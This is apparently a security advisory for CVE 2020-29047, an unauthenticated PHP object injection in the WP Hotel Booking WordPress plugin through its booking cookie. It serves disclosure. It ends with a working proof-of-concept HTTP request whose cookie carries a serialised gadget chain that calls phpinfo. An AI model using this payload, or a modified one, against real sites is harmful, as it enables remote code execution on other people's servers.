WP Hotel Booking < 1.10.4 – Unauthenticated PHP Object Injection | CVE 2020-29047

Description

The plugin unserialised the value in the thimpress_hotel_booking_1 cookie without sanitisation, which could lead to an unauthenticated PHP Object Injection. If the plugin is installed on WP < 5.5.2, then there is a suitable gadget chain to obtain RCE, otherwise, another gadget chain will have to be used (ie from another installed plugin for instance).

The fix attempted in 1.10.3 (ie sanitising the cookie value through sanitize_text_field()) does nothing against PHP Object Injection and the plugin was still vulnerable, despite the original advisory stating that the issue has been fixed. This has been escalated to the WordPress plugin team on March 4th, 2021 and version 1.10.4 released on March 19th, 2021 fixed the issue.

Proof of Concept

GET / HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
Upgrade-Insecure-Requests: 1